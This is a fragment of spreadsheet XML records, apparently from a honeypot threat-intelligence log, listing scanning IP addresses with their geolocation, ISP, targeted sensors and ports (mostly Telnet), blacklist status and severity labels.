    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="corporate"/>
    <s v="BSNL GSM EastZone"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b62:17f8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3093"/>
    <x v="3093"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T22:24:28"/>
    <d v="2025-04-04T22:24:28"/>
    <d v="2025-04-04T22:24:28"/>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d1:edc"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3094"/>
    <x v="3094"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T22:14:01"/>
    <d v="2025-04-04T22:14:01"/>
    <d v="2025-04-04T22:14:01"/>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f8:3a8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3095"/>
    <x v="3095"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T22:08:17"/>
    <d v="2025-04-04T11:56:45"/>
    <d v="2025-04-04T22:08:17"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H3"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="78"/>
    <s v="Karabük Province"/>
    <s v="Karabük Merkez"/>
    <s v="Karabük"/>
    <s v="744562"/>
    <s v="NA"/>
    <s v="41.1956"/>
    <s v="32.6227"/>
    <s v="47331"/>
    <s v="TTNet A.S."/>
    <s v="TurkTelecom"/>
    <s v="residential"/>
    <s v="Turk Telekomunikasyon A.S"/>
    <s v="2007-05-01"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4eaf:5a0f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3096"/>
    <x v="3096"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T22:01:04"/>
    <d v="2024-06-01T19:17:00"/>
    <d v="2025-04-04T22:01:04"/>
    <n v="86"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H45"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;45965&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2eb9:5476"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3097"/>
    <x v="3097"/>
    <s v="NA&amp;&amp;h159-112-17-118.spkqwa.broadband.dynamic.tds.net"/>
    <x v="0"/>
    <d v="2025-04-04T21:57:50"/>
    <d v="2025-04-03T12:38:52"/>
    <d v="2025-04-04T21:57:50"/>
    <n v="69"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H37"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="WA"/>
    <s v="Washington"/>
    <s v="King"/>
    <s v="Redmond"/>
    <s v="5808079"/>
    <s v="98073"/>
    <s v="47.674"/>
    <s v="-122.122"/>
    <s v="4181"/>
    <s v="TDS TELECOM"/>
    <s v="TDS TELECOM"/>
    <s v="residential"/>
    <s v="TDS TELECOM"/>
    <s v="2022-06-30"/>
    <s v="TDST"/>
    <s v="2022-06-30"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9f70:1176"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3098"/>
    <x v="3098"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T21:36:19"/>
    <d v="2025-04-04T21:36:19"/>
    <d v="2025-04-04T21:36:19"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="Wimax Project"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f3:40d2"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3099"/>
    <x v="3099"/>
    <s v="220-134-6-144.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-04T21:28:55"/>
    <d v="2024-12-23T20:33:53"/>
    <d v="2025-04-04T21:28:55"/>
    <n v="285"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H38"/>
    <s v="23&amp;&amp;16166&amp;&amp;41959"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc86:690"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3100"/>
    <x v="3100"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T21:28:53"/>
    <d v="2025-04-04T16:24:47"/>
    <d v="2025-04-04T21:28:53"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Kaithal"/>
    <s v="Kaithal"/>
    <s v="1268593"/>
    <s v="NA"/>
    <s v="29.8015"/>
    <s v="76.3996"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c5:89b0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3101"/>
    <x v="3101"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T21:16:22"/>
    <d v="2025-04-04T21:16:22"/>
    <d v="2025-04-04T21:16:22"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="AP"/>
    <s v="Andhra Pradesh"/>
    <s v="West Godavari"/>
    <s v="Bhimavaram"/>
    <s v="1275947"/>
    <s v="NA"/>
    <s v="16.5408"/>
    <s v="81.5232"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="BB Multiplay"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d03:36b9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3102"/>
    <x v="3102"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T20:59:03"/>
    <d v="2025-04-04T20:59:03"/>
    <d v="2025-04-04T20:59:03"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7838:5798"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3103"/>
    <x v="3103"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T20:47:30"/>
    <d v="2025-02-20T13:04:34"/>
    <d v="2025-04-04T20:47:30"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_SMB_H9&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="445&amp;&amp;23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="RJ"/>
    <s v="Rajasthan"/>
    <s v="Ajmer"/>
    <s v="Ajmer"/>
    <s v="1279159"/>
    <s v="305001"/>
    <s v="26.4499"/>
    <s v="74.6399"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2004-09-06"/>
    <s v="BSNL-GSM-SouthZone"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_SMB:Incoming connection (59.91.39.83,63035)}&amp;&amp;{Data_SMB:Incoming connection (59.91.39.83,63084)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (59.91.39.83,64101)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5b:2753"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3104"/>
    <x v="3104"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T20:32:30"/>
    <d v="2025-03-19T12:57:06"/>
    <d v="2025-04-04T20:32:30"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H34"/>
    <s v="23&amp;&amp;57189"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="BG"/>
    <s v="Bulgaria"/>
    <s v="01"/>
    <s v="Blagoevgrad"/>
    <s v="Gotse Delchev"/>
    <s v="Gotse Delchev"/>
    <s v="731108"/>
    <s v="2900"/>
    <s v="41.5667"/>
    <s v="23.7333"/>
    <s v="59763"/>
    <s v="GOCE-NET Ltd"/>
    <s v="GOCE"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2017-03-01"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b9c0:541a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3105"/>
    <x v="3105"/>
    <s v="114-35-90-145.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-04T20:00:58"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-04T20:00:58"/>
    <n v="511"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H34&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;45423&amp;&amp;80&amp;&amp;23&amp;&amp;9100&amp;&amp;50372&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login&amp;&amp;connection&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7223:5a91"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3106"/>
    <x v="3106"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T19:51:23"/>
    <d v="2023-11-28T16:37:20"/>
    <d v="2025-04-04T19:51:23"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_MYSQL_HC1"/>
    <s v="56554&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="PH"/>
    <s v="Philippines"/>
    <s v="07"/>
    <s v="Central Visayas"/>
    <s v="Negros Oriental"/>
    <s v="Balayong"/>
    <s v="1728318"/>
    <s v="NA"/>
    <s v="9.4744"/>
    <s v="123.062"/>
    <s v="132199"/>
    <s v="Globe Telecom Inc."/>
    <s v="Globe Telecom"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2008-03-13"/>
    <s v="GBB-MAKATI"/>
    <s v="None"/>
    <s v="None&amp;&amp;connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:781c:a83e"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3107"/>
    <x v="3107"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T19:27:53"/>
    <d v="2025-04-04T19:27:53"/>
    <d v="2025-04-04T19:27:53"/>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5:e31a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3108"/>
    <x v="3108"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T19:16:06"/>
    <d v="2025-04-04T19:14:42"/>
    <d v="2025-04-04T19:16:06"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5f:5f90"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3109"/>
    <x v="3109"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T19:06:53"/>
    <d v="2025-04-04T19:04:09"/>
    <d v="2025-04-04T19:06:53"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="MM"/>
    <s v="Myanmar"/>
    <s v="04"/>
    <s v="Mandalay Region"/>
    <s v="Mandalay District"/>
    <s v="Mandalay (Chanmyathazi Township)"/>
    <s v="1311874"/>
    <s v="NA"/>
    <s v="21.943"/>
    <s v="96.0922"/>
    <s v="18399"/>
    <s v="Yatanarpon Teleport Company Limited"/>
    <s v="Yatanarpon Teleport Company Limited"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="NET-MM-TELEPORT"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d04:488e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
